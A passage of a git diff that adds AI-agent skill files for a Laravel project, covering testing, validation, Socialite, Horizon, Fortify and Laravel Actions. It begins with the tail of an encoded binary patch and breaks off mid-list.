zUbG<&U@+hqpTwb66HbfF_9EkG8kC{(+jP~sK#I9+&i5De=}^gpPL6(uGBtH!P3npX
z5gu@<cY=CcXPBQ*zz${Au&g8^AUg!H1`K!B7*O_779C1xnw@oM7@c+KN1gQs*GH?O
zYs7u5l-qQ8w!$$KHeOYg%DYQ_vP9l;v+e9FJ`wI!z=6)S;`{!;+#fD0)VRXkM-2)_
zleZ}@rcK|yjrj9!K!2cL-k}Kt;##0eaA8i8Uh9P$u^&YRxGSuC9DpsLX%s%mb8x-R
zGqT&N2r&w)ji~b&R;JL07?H4)51A|(U?b{HCN;nw*MM!`q&0|O$_?$Pk%&#>s9|qK
z8N(d$vlHhUP>F9>t{h<Jz~8u79#^rwSdk6BgsnbqIsXivQTqercyvAlk$)d0jX+ib
z=!)#nKYxlXO7G_1q*06odgnus$6W!jT3NYM=uDqm2^Ox8sxc|ax%xZvefbsr2JrXg
zS4Y+7bp8Cu3mD0O&f;G7fA@6!wBtByWzw%7MJT#^{cR^ap~G-&?q0v7tteE9cMIcD
z8<}2Z6$%iH0rk_3_obVhoyiBmSTzP@ojEB0z3Cv~XrXIk7X4c#?V<lR{g~3llu|r~
z_yxvLRKm$XJb%}e6?e|=yc1yZ*j|Apn0rW2rv)K--0YS}DmNO9tXi{0KMXSy1q2I8
zS9k*D9PZd5A&1)-3`Va<xydl`aSYG`(I2%Yt(+&bCb1Jrhmo&=HExSwgTJvYyU>c!
zpk(1NTthYH##aU%kYR<so1e|*b9h6~dD=~qZw%f<o-mYQk6^RAO<p3TJhP0c!}#L%
z`X#I2_FYc_u+#R~kf|_CCz_)a-+oBh^2Z<Py)(rE^@&Fqqepm(4(O+!mUUyQn_)-C
z*Q?5VJQ{+fi%0L>Xf1Z5TJ#a|1EE=6q<>`nN5$zBCL1$xV1li$&!Wm{EWjJgF+mOY
z2m}FlAue$xtpY2C90Ue9gpB9NU51F{eEN|$BM6k3O;JN_tnZ3KW*Cu$J)pVA7jKfx
zaAd+LQR$pk$3cm3G=+DZ*%xEtGUz;w>gE-uon7-1V<>b8zw_u7Tofqy@TeZsE$W5A
zjUuG+Q%gDQht~?<UN@uwRVPLo`MPpSR4-mbpC`1Qq-GnLeIT{wqQkhybDt;<^xnXs
z1mu2Zs>1jCf*ZqtdaFudezoDD5U(J5b>JS*l%5P?3c6WmL#(LhH_DBsfbQ>Dd4CXi
F{|%Ge#T5Vm

literal 0
HcmV?d00001

diff --git a/.agents/skills/laravel-best-practices/rules/testing.md b/.agents/skills/laravel-best-practices/rules/testing.md
new file mode 100644
index 000000000..d39cc3ed0
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/testing.md
@@ -0,0 +1,43 @@
+# Testing Best Practices
+
+## Use `LazilyRefreshDatabase` Over `RefreshDatabase`
+
+`RefreshDatabase` runs all migrations every test run even when the schema hasn't changed. `LazilyRefreshDatabase` only migrates when needed, significantly speeding up large suites.
+
+## Use Model Assertions Over Raw Database Assertions
+
+Incorrect: `$this->assertDatabaseHas('users', ['id' => $user->id]);`
+
+Correct: `$this->assertModelExists($user);`
+
+More expressive, type-safe, and fails with clearer messages.
+
+## Use Factory States and Sequences
+
+Named states make tests self-documenting. Sequences eliminate repetitive setup.
+
+Incorrect: `User::factory()->create(['email_verified_at' => null]);`
+
+Correct: `User::factory()->unverified()->create();`
+
+## Use `Exceptions::fake()` to Assert Exception Reporting
+
+Instead of `withoutExceptionHandling()`, use `Exceptions::fake()` to assert the correct exception was reported while the request completes normally.
+
+## Call `Event::fake()` After Factory Setup
+
+Model factories rely on model events (e.g., `creating` to generate UUIDs). Calling `Event::fake()` before factory calls silences those events, producing broken models.
+
+Incorrect: `Event::fake(); $user = User::factory()->create();`
+
+Correct: `$user = User::factory()->create(); Event::fake();`
+
+## Use `recycle()` to Share Relationship Instances Across Factories
+
+Without `recycle()`, nested factories create separate instances of the same conceptual entity.
+
+```php
+Ticket::factory()
+    ->recycle(Airline::factory()->create())
+    ->create();
+```
\ No newline at end of file
diff --git a/.agents/skills/laravel-best-practices/rules/validation.md b/.agents/skills/laravel-best-practices/rules/validation.md
new file mode 100644
index 000000000..a20202ff1
--- /dev/null
+++ b/.agents/skills/laravel-best-practices/rules/validation.md
@@ -0,0 +1,75 @@
+# Validation & Forms Best Practices
+
+## Use Form Request Classes
+
+Extract validation from controllers into dedicated Form Request classes.
+
+Incorrect:
+```php
+public function store(Request $request)
+{
+    $request->validate([
+        'title' => 'required|max:255',
+        'body' => 'required',
+    ]);
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request)
+{
+    Post::create($request->validated());
+}
+```
+
+## Array vs. String Notation for Rules
+
+Array syntax is more readable and composes cleanly with `Rule::` objects. Prefer it in new code, but check existing Form Requests first and match whatever notation the project already uses.
+
+```php
+// Preferred for new code
+'email' => ['required', 'email', Rule::unique('users')],
+
+// Follow existing convention if the project uses string notation
+'email' => 'required|email|unique:users',
+```
+
+## Always Use `validated()`
+
+Get only validated data. Never use `$request->all()` for mass operations.
+
+Incorrect:
+```php
+Post::create($request->all());
+```
+
+Correct:
+```php
+Post::create($request->validated());
+```
+
+## Use `Rule::when()` for Conditional Validation
+
+```php
+'company_name' => [
+    Rule::when($this->account_type === 'business', ['required', 'string', 'max:255']),
+],
+```
+
+## Use the `after()` Method for Custom Validation
+
+Use `after()` instead of `withValidator()` for custom validation logic that depends on multiple fields.
+
+```php
+public function after(): array
+{
+    return [
+        function (Validator $validator) {
+            if ($this->quantity > Product::find($this->product_id)?->stock) {
+                $validator->errors()->add('quantity', 'Not enough stock.');
+            }
+        },
+    ];
+}
+```
\ No newline at end of file
diff --git a/.agents/skills/socialite-development/SKILL.md b/.agents/skills/socialite-development/SKILL.md
new file mode 100644
index 000000000..e660da691
--- /dev/null
+++ b/.agents/skills/socialite-development/SKILL.md
@@ -0,0 +1,80 @@
+---
+name: socialite-development
+description: "Manages OAuth social authentication with Laravel Socialite. Activate when adding social login providers; configuring OAuth redirect/callback flows; retrieving authenticated user details; customizing scopes or parameters; setting up community providers; testing with Socialite fakes; or when the user mentions social login, OAuth, Socialite, or third-party authentication."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Socialite Authentication
+
+## Documentation
+
+Use `search-docs` for detailed Socialite patterns and documentation (installation, configuration, routing, callbacks, testing, scopes, stateless auth).
+
+## Available Providers
+
+Built-in: `facebook`, `twitter`, `twitter-oauth-2`, `linkedin`, `linkedin-openid`, `google`, `github`, `gitlab`, `bitbucket`, `slack`, `slack-openid`, `twitch`
+
+Community: 150+ additional providers at [socialiteproviders.com](https://socialiteproviders.com). For provider-specific setup, use `WebFetch` on `https://socialiteproviders.com/{provider-name}`.
+
+Configuration key in `config/services.php` must match the driver name exactly — note the hyphenated keys: `twitter-oauth-2`, `linkedin-openid`, `slack-openid`.
+
+Twitter/X: Use `twitter-oauth-2` (OAuth 2.0) for new projects. The legacy `twitter` driver is OAuth 1.0. Driver names remain unchanged despite the platform rebrand.
+
+Community providers differ from built-in providers in the following ways:
+- Installed via `composer require socialiteproviders/{name}`
+- Must register via event listener — NOT auto-discovered like built-in providers
+- Use `search-docs` for the registration pattern
+
+## Adding a Provider
+
+### 1. Configure the provider
+
+Add the provider's `client_id`, `client_secret`, and `redirect` to `config/services.php`. The config key must match the driver name exactly.
+
+### 2. Create redirect and callback routes
+
+Two routes are needed: one that calls `Socialite::driver('provider')->redirect()` to send the user to the OAuth provider, and one that calls `Socialite::driver('provider')->user()` to receive the callback and retrieve user details.
+
+### 3. Authenticate and store the user
+
+In the callback, use `updateOrCreate` to find or create a user record from the provider's response (`id`, `name`, `email`, `token`, `refreshToken`), then call `Auth::login()`.
+
+### 4. Customize the redirect (optional)
+
+- `scopes()` — merge additional scopes with the provider's defaults
+- `setScopes()` — replace all scopes entirely
+- `with()` — pass optional parameters (e.g., `['hd' => 'example.com']` for Google)
+- `asBotUser()` — Slack only; generates a bot token (`xoxb-`) instead of a user token (`xoxp-`). Must be called before both `redirect()` and `user()`. Only the `token` property will be hydrated on the user object.
+- `stateless()` — for API/SPA contexts where session state is not maintained
+
+### 5. Verify
+
+1. Config key matches driver name exactly (check the list above for hyphenated names)
+2. `client_id`, `client_secret`, and `redirect` are all present
+3. Redirect URL matches what is registered in the provider's OAuth dashboard
+4. Callback route handles denied grants (when user declines authorization)
+
+Use `search-docs` for complete code examples of each step.
+
+## Additional Features
+
+Use `search-docs` for usage details on: `enablePKCE()`, `userFromToken($token)`, `userFromTokenAndSecret($token, $secret)` (OAuth 1.0), retrieving user details.
+
+User object: `getId()`, `getName()`, `getEmail()`, `getAvatar()`, `getNickname()`, `token`, `refreshToken`, `expiresIn`, `approvedScopes`
+
+## Testing
+
+Socialite provides `Socialite::fake()` for testing redirects and callbacks. Use `search-docs` for faking redirects, callback user data, custom token properties, and assertion methods.
+
+## Common Pitfalls
+
+- Config key must match driver name exactly — hyphenated drivers need hyphenated keys (`linkedin-openid`, `slack-openid`, `twitter-oauth-2`). Mismatch silently fails.
+- Every provider needs `client_id`, `client_secret`, and `redirect` in `config/services.php`. Missing any one causes cryptic errors.
+- `scopes()` merges with defaults; `setScopes()` replaces all scopes entirely.
+- Missing `stateless()` in API/SPA contexts causes `InvalidStateException`.
+- Redirect URL in `config/services.php` must exactly match the provider's OAuth dashboard (including trailing slashes and protocol).
+- Do not pass `state`, `response_type`, `client_id`, `redirect_uri`, or `scope` via `with()` — these are reserved.
+- Community providers require event listener registration via `SocialiteWasCalled`.
+- `user()` throws when the user declines authorization. Always handle denied grants.
\ No newline at end of file
diff --git a/.claude/skills/configuring-horizon/SKILL.md b/.claude/skills/configuring-horizon/SKILL.md
new file mode 100644
index 000000000..bed1e74c0
--- /dev/null
+++ b/.claude/skills/configuring-horizon/SKILL.md
@@ -0,0 +1,85 @@
+---
+name: configuring-horizon
+description: "Use this skill whenever the user mentions Horizon by name in a Laravel context. Covers the full Horizon lifecycle: installing Horizon (horizon:install, Sail setup), configuring config/horizon.php (supervisor blocks, queue assignments, balancing strategies, minProcesses/maxProcesses), fixing the dashboard (authorization via Gate::define viewHorizon, blank metrics, horizon:snapshot scheduling), and troubleshooting production issues (worker crashes, timeout chain ordering, LongWaitDetected notifications, waits config). Also covers job tagging and silencing. Do not use for generic Laravel queues without Horizon, SQS or database drivers, standalone Redis setup, Linux supervisord, Telescope, or job batching."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Horizon Configuration
+
+## Documentation
+
+Use `search-docs` for detailed Horizon patterns and documentation covering configuration, supervisors, balancing, dashboard authorization, tags, notifications, metrics, and deployment.
+
+For deeper guidance on specific topics, read the relevant reference file before implementing:
+
+- `references/supervisors.md` covers supervisor blocks, balancing strategies, multi-queue setups, and auto-scaling
+- `references/notifications.md` covers LongWaitDetected alerts, notification routing, and the `waits` config
+- `references/tags.md` covers job tagging, dashboard filtering, and silencing noisy jobs
+- `references/metrics.md` covers the blank metrics dashboard, snapshot scheduling, and retention config
+
+## Basic Usage
+
+### Installation
+
+```bash
+php artisan horizon:install
+```
+
+### Supervisor Configuration
+
+Define supervisors in `config/horizon.php`. The `environments` array merges into `defaults` and does not replace the whole supervisor block:
+
+<!-- Supervisor Config -->
+```php
+'defaults' => [
+    'supervisor-1' => [
+        'connection' => 'redis',
+        'queue' => ['default'],
+        'balance' => 'auto',
+        'minProcesses' => 1,
+        'maxProcesses' => 10,
+        'tries' => 3,
+    ],
+],
+
+'environments' => [
+    'production' => [
+        'supervisor-1' => ['maxProcesses' => 20, 'balanceCooldown' => 3],
+    ],
+    'local' => [
+        'supervisor-1' => ['maxProcesses' => 2],
+    ],
+],
+```
+
+### Dashboard Authorization
+
+Restrict access in `App\Providers\HorizonServiceProvider`:
+
+<!-- Dashboard Gate -->
+```php
+protected function gate(): void
+{
+    Gate::define('viewHorizon', function (User $user) {
+        return $user->is_admin;
+    });
+}
+```
+
+## Verification
+
+1. Run `php artisan horizon` and visit `/horizon`
+2. Confirm dashboard access is restricted as expected
+3. Check that metrics populate after scheduling `horizon:snapshot`
+
+## Common Pitfalls
+
+- Horizon only works with the Redis queue driver. Other drivers such as database and SQS are not supported.
+- Redis Cluster is not supported. Horizon requires a standalone Redis connection.
+- Always check `config/horizon.php` before making changes to understand the current supervisor and environment configuration.
+- The `environments` array overrides only the keys you specify. It merges into `defaults` and does not replace it.
+- The timeout chain must be ordered: job `timeout` less than supervisor `timeout` less than `retry_after`. The wrong order can cause jobs to be retried before Horizon finishes timing them out.
+- The metrics dashboard stays blank until `horizon:snapshot` is scheduled. Running `php artisan horizon` alone does not populate metrics.
+- Always use `search-docs` for the latest Horizon documentation rather than relying on this skill alone.
\ No newline at end of file
diff --git a/.claude/skills/configuring-horizon/references/metrics.md b/.claude/skills/configuring-horizon/references/metrics.md
new file mode 100644
index 000000000..312f79ee7
--- /dev/null
+++ b/.claude/skills/configuring-horizon/references/metrics.md
@@ -0,0 +1,21 @@
+# Metrics & Snapshots
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon metrics snapshot"` for the snapshot command and scheduling
+- `"horizon trim snapshots"` for retention configuration
+
+## What to Watch For
+
+### Metrics dashboard stays blank until `horizon:snapshot` is scheduled
+
+Running `horizon` artisan command does not populate metrics automatically. The metrics graph is built from snapshots, so `horizon:snapshot` must be scheduled to run every 5 minutes via Laravel's scheduler.
+
+### Register the snapshot in the scheduler rather than running it manually
+
+A single manual run populates the dashboard momentarily but will not keep it updated. Search `"horizon metrics snapshot"` for the exact scheduler registration syntax, which differs between Laravel 10 and 11+.
+
+### `metrics.trim_snapshots` is a snapshot count, not a time duration
+
+The `trim_snapshots.job` and `trim_snapshots.queue` values in `config/horizon.php` are counts of snapshots to keep, not minutes or hours. With the default of 24 snapshots at 5-minute intervals, that provides 2 hours of history. Increase the value to retain more history at the cost of Redis memory usage.
\ No newline at end of file
diff --git a/.claude/skills/configuring-horizon/references/notifications.md b/.claude/skills/configuring-horizon/references/notifications.md
new file mode 100644
index 000000000..943d1a26a
--- /dev/null
+++ b/.claude/skills/configuring-horizon/references/notifications.md
@@ -0,0 +1,21 @@
+# Notifications & Alerts
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon notifications"` for Horizon's built-in notification routing helpers
+- `"horizon long wait detected"` for LongWaitDetected event details
+
+## What to Watch For
+
+### `waits` in `config/horizon.php` controls the LongWaitDetected threshold
+
+The `waits` array (e.g., `'redis:default' => 60`) defines how many seconds a job can wait in a queue before Horizon fires a `LongWaitDetected` event. This value is set in the config file, not in Horizon's notification routing. If alerts are firing too often or too late, adjust `waits` rather than the routing configuration.
+
+### Use Horizon's built-in notification routing in `HorizonServiceProvider`
+
+Configure notifications in the `boot()` method of `App\Providers\HorizonServiceProvider` using `Horizon::routeMailNotificationsTo()`, `Horizon::routeSlackNotificationsTo()`, or `Horizon::routeSmsNotificationsTo()`. Horizon already wires `LongWaitDetected` to its notification sender, so the documented setup is notification routing rather than manual listener registration.
+
+### Failed job alerts are separate from Horizon's documented notification routing
+
+Horizon's 12.x documentation covers built-in long-wait notifications. Do not assume the docs provide a `JobFailed` listener example in `HorizonServiceProvider`. If a user needs failed job alerts, treat that as custom queue event handling and consult the queue documentation instead of Horizon's notification-routing API.
\ No newline at end of file
diff --git a/.claude/skills/configuring-horizon/references/supervisors.md b/.claude/skills/configuring-horizon/references/supervisors.md
new file mode 100644
index 000000000..9da0c1769
--- /dev/null
+++ b/.claude/skills/configuring-horizon/references/supervisors.md
@@ -0,0 +1,27 @@
+# Supervisor & Balancing Configuration
+
+## Where to Find It
+
+Search with `search-docs` before writing any supervisor config, as option names and defaults change between Horizon versions:
+- `"horizon supervisor configuration"` for the full options list
+- `"horizon balancing strategies"` for auto, simple, and false modes
+- `"horizon autoscaling workers"` for autoScalingStrategy details
+- `"horizon environment configuration"` for the defaults and environments merge
+
+## What to Watch For
+
+### The `environments` array merges into `defaults` rather than replacing it
+
+The `defaults` array defines the complete base supervisor config. The `environments` array patches it per environment, overriding only the keys listed. There is no need to repeat every key in each environment block. A common pattern is to define `connection`, `queue`, `balance`, `autoScalingStrategy`, `tries`, and `timeout` in `defaults`, then override only `maxProcesses`, `balanceMaxShift`, and `balanceCooldown` in `production`.
+
+### Use separate named supervisors to enforce queue priority
+
+Horizon does not enforce queue order when using `balance: auto` on a single supervisor. The `queue` array order is ignored for load balancing. To process `notifications` before `default`, use two separately named supervisors: one for the high-priority queue with a higher `maxProcesses`, and one for the low-priority queue with a lower cap. The docs include an explicit note about this.
+
+### Use `balance: false` to keep a fixed number of workers on a dedicated queue
+
+Auto-balancing suits variable load, but if a queue should always have exactly N workers such as a video-processing queue limited to 2, set `balance: false` and `maxProcesses: 2`. Auto-balancing would scale it up during bursts, which may be undesirable.
+
+### Set `balanceCooldown` to prevent rapid worker scaling under bursty load
+
+When using `balance: auto`, the supervisor can scale up and down rapidly under bursty load. Set `balanceCooldown` to the number of seconds between scaling decisions, typically 3 to 5, to smooth this out. `balanceMaxShift` limits how many processes are added or removed per cycle.
\ No newline at end of file
diff --git a/.claude/skills/configuring-horizon/references/tags.md b/.claude/skills/configuring-horizon/references/tags.md
new file mode 100644
index 000000000..263c955c1
--- /dev/null
+++ b/.claude/skills/configuring-horizon/references/tags.md
@@ -0,0 +1,21 @@
+# Tags & Silencing
+
+## Where to Find It
+
+Search with `search-docs`:
+- `"horizon tags"` for the tagging API and auto-tagging behaviour
+- `"horizon silenced jobs"` for the `silenced` and `silenced_tags` config options
+
+## What to Watch For
+
+### Eloquent model jobs are tagged automatically without any extra code
+
+If a job's constructor accepts Eloquent model instances, Horizon automatically tags the job with `ModelClass:id` such as `App\Models\User:42`. These tags are filterable in the dashboard without any changes to the job class. Only add a `tags()` method when custom tags beyond auto-tagging are needed.
+
+### `silenced` hides jobs from the dashboard completed list but does not stop them from running
+
+Adding a job class to the `silenced` array in `config/horizon.php` removes it from the completed jobs view. The job still runs normally. This is a dashboard noise-reduction tool, not a way to disable jobs.
+
+### `silenced_tags` hides all jobs carrying a matching tag from the completed list
+
+Any job carrying a matching tag string is hidden from the completed jobs view. This is useful for silencing a category of jobs such as all jobs tagged `notifications`, rather than silencing specific classes.
\ No newline at end of file
diff --git a/.claude/skills/fortify-development/SKILL.md b/.claude/skills/fortify-development/SKILL.md
new file mode 100644
index 000000000..86322d9c0
--- /dev/null
+++ b/.claude/skills/fortify-development/SKILL.md
@@ -0,0 +1,131 @@
+---
+name: fortify-development
+description: 'ACTIVATE when the user works on authentication in Laravel. This includes login, registration, password reset, email verification, two-factor authentication (2FA/TOTP/QR codes/recovery codes), profile updates, password confirmation, or any auth-related routes and controllers. Activate when the user mentions Fortify, auth, authentication, login, register, signup, forgot password, verify email, 2FA, or references app/Actions/Fortify/, CreateNewUser, UpdateUserProfileInformation, FortifyServiceProvider, config/fortify.php, or auth guards. Fortify is the frontend-agnostic authentication backend for Laravel that registers all auth routes and controllers. Also activate when building SPA or headless authentication, customizing login redirects, overriding response contracts like LoginResponse, or configuring login throttling. Do NOT activate for Laravel Passport (OAuth2 API tokens), Socialite (OAuth social login), or non-auth Laravel features.'
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Laravel Fortify Development
+
+Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
+
+## Documentation
+
+Use `search-docs` for detailed Laravel Fortify patterns and documentation.
+
+## Usage
+
+- **Routes**: Use `list-routes` with `only_vendor: true` and `action: "Fortify"` to see all registered endpoints
+- **Actions**: Check `app/Actions/Fortify/` for customizable business logic (user creation, password validation, etc.)
+- **Config**: See `config/fortify.php` for all options including features, guards, rate limiters, and username field
+- **Contracts**: Look in `Laravel\Fortify\Contracts\` for overridable response classes (`LoginResponse`, `LogoutResponse`, etc.)
+- **Views**: All view callbacks are set in `FortifyServiceProvider::boot()` using `Fortify::loginView()`, `Fortify::registerView()`, etc.
+
+## Available Features
+
+Enable in `config/fortify.php` features array:
+
+- `Features::registration()` - User registration
+- `Features::resetPasswords()` - Password reset via email
+- `Features::emailVerification()` - Requires User to implement `MustVerifyEmail`
+- `Features::updateProfileInformation()` - Profile updates
+- `Features::updatePasswords()` - Password changes
+- `Features::twoFactorAuthentication()` - 2FA with QR codes and recovery codes
+
+> Use `search-docs` for feature configuration options and customization patterns.
+
+## Setup Workflows
+
+### Two-Factor Authentication Setup
+
+```
+- [ ] Add TwoFactorAuthenticatable trait to User model
+- [ ] Enable feature in config/fortify.php
+- [ ] If the `*_add_two_factor_columns_to_users_table.php` migration is missing, publish via `php artisan vendor:publish --tag=fortify-migrations` and migrate
+- [ ] Set up view callbacks in FortifyServiceProvider
+- [ ] Create 2FA management UI
+- [ ] Test QR code and recovery codes
+```
+
+> Use `search-docs` for TOTP implementation and recovery code handling patterns.
+
+### Email Verification Setup
+
+```
+- [ ] Enable emailVerification feature in config
+- [ ] Implement MustVerifyEmail interface on User model
+- [ ] Set up verifyEmailView callback
+- [ ] Add verified middleware to protected routes
+- [ ] Test verification email flow
+```
+
+> Use `search-docs` for MustVerifyEmail implementation patterns.
+
+### Password Reset Setup
+
+```
+- [ ] Enable resetPasswords feature in config
+- [ ] Set up requestPasswordResetLinkView callback
+- [ ] Set up resetPasswordView callback
+- [ ] Define password.reset named route (if views disabled)
+- [ ] Test reset email and link flow
+```
+
+> Use `search-docs` for custom password reset flow patterns.
+
+### SPA Authentication Setup
+
+```
+- [ ] Set 'views' => false in config/fortify.php
+- [ ] Install and configure Laravel Sanctum for session-based SPA authentication
+- [ ] Use the 'web' guard in config/fortify.php (required for session-based authentication)
+- [ ] Set up CSRF token handling
+- [ ] Test XHR authentication flows
+```
+
+> Use `search-docs` for integration and SPA authentication patterns.
+
+#### Two-Factor Authentication in SPA Mode
+
+When `views` is set to `false`, Fortify returns JSON responses instead of redirects.
+
+If a user attempts to log in and two-factor authentication is enabled, the login request will return a JSON response indicating that a two-factor challenge is required:
+
+```json
+{
+    "two_factor": true
+}
+```
+
+## Best Practices
+
+### Custom Authentication Logic
+
+Override authentication behavior using `Fortify::authenticateUsing()` for custom user retrieval or `Fortify::authenticateThrough()` to customize the authentication pipeline. Override response contracts in `AppServiceProvider` for custom redirects.
+
+### Registration Customization
+
+Modify `app/Actions/Fortify/CreateNewUser.php` to customize user creation logic, validation rules, and additional fields.
+
+### Rate Limiting
+
+Configure via `fortify.limiters.login` in config. Default configuration throttles by username + IP combination.
+
+## Key Endpoints
+
+| Feature                | Method   | Endpoint                                    |
+|------------------------|----------|---------------------------------------------|
+| Login                  | POST     | `/login`                                    |
+| Logout                 | POST     | `/logout`                                   |
+| Register               | POST     | `/register`                                 |
+| Password Reset Request | POST     | `/forgot-password`                          |
+| Password Reset         | POST     | `/reset-password`                           |
+| Email Verify Notice    | GET      | `/email/verify`                             |
+| Resend Verification    | POST     | `/email/verification-notification`          |
+| Password Confirm       | POST     | `/user/confirm-password`                    |
+| Enable 2FA             | POST     | `/user/two-factor-authentication`           |
+| Confirm 2FA            | POST     | `/user/confirmed-two-factor-authentication` |
+| 2FA Challenge          | POST     | `/two-factor-challenge`                     |
+| Get QR Code            | GET      | `/user/two-factor-qr-code`                  |
+| Recovery Codes         | GET/POST | `/user/two-factor-recovery-codes`           |
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/SKILL.md b/.claude/skills/laravel-actions/SKILL.md
new file mode 100644
index 000000000..862dd55b5
--- /dev/null
+++ b/.claude/skills/laravel-actions/SKILL.md
@@ -0,0 +1,302 @@
+---
+name: laravel-actions
+description: Build, refactor, and troubleshoot Laravel Actions using lorisleiva/laravel-actions. Use when implementing reusable action classes (object/controller/job/listener/command), converting service classes/controllers/jobs into actions, orchestrating workflows via faked actions, or debugging action entrypoints and wiring.
+---
+
+# Laravel Actions or `lorisleiva/laravel-actions`
+
+## Overview
+
+Use this skill to implement or update actions based on `lorisleiva/laravel-actions` with consistent structure and predictable testing patterns.
+
+## Quick Workflow
+
+1. Confirm the package is installed with `composer show lorisleiva/laravel-actions`.
+2. Create or edit an action class that uses `Lorisleiva\Actions\Concerns\AsAction`.
+3. Implement `handle(...)` with the core business logic first.
+4. Add adapter methods only when needed for the requested entrypoint:
+   - `asController` (+ route/invokable controller usage)
+   - `asJob` (+ dispatch)
+   - `asListener` (+ event listener wiring)
+   - `asCommand` (+ command signature/description)
+5. Add or update tests for the chosen entrypoint.
+6. When tests need isolation, use action fakes (`MyAction::fake()`) and assertions (`MyAction::assertDispatched()`).
+
+## Base Action Pattern
+
+Use this minimal skeleton and expand only what is needed.
+
+```php
+<?php
+
+namespace App\Actions;
+
+use Lorisleiva\Actions\Concerns\AsAction;
+
+class PublishArticle
+{
+    use AsAction;
+
+    public function handle(int $articleId): bool
+    {
+        return true;
+    }
+}
+```
+
+## Project Conventions
+
+- Place action classes in `App\Actions` unless an existing domain sub-namespace is already used.
+- Use descriptive `VerbNoun` naming (e.g. `PublishArticle`, `SyncVehicleTaxStatus`).
+- Keep domain/business logic in `handle(...)`; keep transport and framework concerns in adapter methods (`asController`, `asJob`, `asListener`, `asCommand`).
+- Prefer explicit parameter and return types in all action methods.
+- Prefer PHPDoc for complex data contracts (e.g. array shapes), not inline comments.
+
+### When to Use an Action
+
+- Use an Action when the same use-case needs multiple entrypoints (HTTP, queue, event, CLI) or benefits from first-class orchestration/faking.
+- Keep a plain service class when logic is local, single-entrypoint, and unlikely to be reused as an Action.
+
+## Entrypoint Patterns
+
+### Run as Object
+
+- (prefer method) Use static helper from the trait: `PublishArticle::run($id)`.
+- Use make and call handle: `PublishArticle::make()->handle($id)`.
+- Call with dependency injection: `app(PublishArticle::class)->handle($id)`.
+
+### Run as Controller
+
+- Use route to class (invokable style), e.g. `Route::post('/articles/{id}/publish', PublishArticle::class)`.
+- Add `asController(...)` for HTTP-specific adaptation and return a response.
+- Add request validation (`rules()` or custom validator hooks) when input comes from HTTP.
+
+### Run as Job
+
+- Dispatch with `PublishArticle::dispatch($id)`.
+- Use `asJob(...)` only for queue-specific behavior; keep domain logic in `handle(...)`.
+- In this project, job Actions often define additional queue lifecycle methods and job properties for retries, uniqueness, and timing control.
+
+#### Project Pattern: Job Action with Extra Methods
+
+```php
+<?php
+
+namespace App\Actions\Demo;
+
+use App\Models\Demo;
+use DateTime;
+use Lorisleiva\Actions\Concerns\AsAction;
+use Lorisleiva\Actions\Decorators\JobDecorator;
+
+class GetDemoData
+{
+    use AsAction;
+
+    public int $jobTries = 3;
+
+    public int $jobMaxExceptions = 3;
+
+    public function getJobRetryUntil(): DateTime
+    {
+        return now()->addMinutes(30);
+    }
+
+    public function getJobBackoff(): array
+    {
+        return [60, 120];
+    }
+
+    public function getJobUniqueId(Demo $demo): string
+    {
+        return $demo->id;
+    }
+
+    public function handle(Demo $demo): void
+    {
+        // Core business logic.
+    }
+
+    public function asJob(JobDecorator $job, Demo $demo): void
+    {
+        // Queue-specific orchestration and retry behavior.
+        $this->handle($demo);
+    }
+}
+```
+
+Use these members only when needed:
+
+- `$jobTries`: max attempts for the queued execution.
+- `$jobMaxExceptions`: max unhandled exceptions before failing.
+- `getJobRetryUntil()`: absolute retry deadline.
+- `getJobBackoff()`: retry delay strategy per attempt.
+- `getJobUniqueId(...)`: deduplication key for unique jobs.
+- `asJob(JobDecorator $job, ...)`: access attempt metadata and queue-only branching.
+
+### Run as Listener
+
+- Register the action class as listener in `EventServiceProvider`.
+- Use `asListener(EventName $event)` and delegate to `handle(...)`.
+
+### Run as Command
+
+- Define `$commandSignature` and `$commandDescription` properties.
+- Implement `asCommand(Command $command)` and keep console IO in this method only.
+- Import `Command` with `use Illuminate\Console\Command;`.
+
+## Testing Guidance
+
+Use a two-layer strategy:
+
+1. `handle(...)` tests for business correctness.
+2. entrypoint tests (`asController`, `asJob`, `asListener`, `asCommand`) for wiring/orchestration.
+
+### Deep Dive: `AsFake` methods (2.x)
+
+Reference: https://www.laravelactions.com/2.x/as-fake.html
+
+Use these methods intentionally based on what you want to prove.
+
+#### `mock()`
+
+- Replaces the action with a full mock.
+- Best when you need strict expectations and argument assertions.
+
+```php
+PublishArticle::mock()
+    ->shouldReceive('handle')
+    ->once()
+    ->with(42)
+    ->andReturnTrue();
+```
+
+#### `partialMock()`
+
+- Replaces the action with a partial mock.
+- Best when you want to keep most real behavior but stub one expensive/internal method.
+
+```php
+PublishArticle::partialMock()
+    ->shouldReceive('fetchRemoteData')
+    ->once()
+    ->andReturn(['ok' => true]);
+```
+
+#### `spy()`
+
+- Replaces the action with a spy.
+- Best for post-execution verification ("was called with X") without predefining all expectations.
+
+```php
+$spy = PublishArticle::spy()->allows('handle')->andReturnTrue();
+
+// execute code that triggers the action...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+#### `shouldRun()`
+
+- Shortcut for `mock()->shouldReceive('handle')`.
+- Best for compact orchestration assertions.
+
+```php
+PublishArticle::shouldRun()->once()->with(42)->andReturnTrue();
+```
+
+#### `shouldNotRun()`
+
+- Shortcut for `mock()->shouldNotReceive('handle')`.
+- Best for guard-clause tests and branch coverage.
+
+```php
+PublishArticle::shouldNotRun();
+```
+
+#### `allowToRun()`
+
+- Shortcut for spy + allowing `handle`.
+- Best when you want execution to proceed but still assert interaction.
+
+```php
+$spy = PublishArticle::allowToRun()->andReturnTrue();
+// ...
+$spy->shouldHaveReceived('handle')->once();
+```
+
+#### `isFake()` and `clearFake()`
+
+- `isFake()` checks whether the class is currently swapped.
+- `clearFake()` resets the fake and prevents cross-test leakage.
+
+```php
+expect(PublishArticle::isFake())->toBeFalse();
+PublishArticle::mock();
+expect(PublishArticle::isFake())->toBeTrue();
+PublishArticle::clearFake();
+expect(PublishArticle::isFake())->toBeFalse();
+```
+
+### Recommended test matrix for Actions
+
+- Business rule test: call `handle(...)` directly with real dependencies/factories.
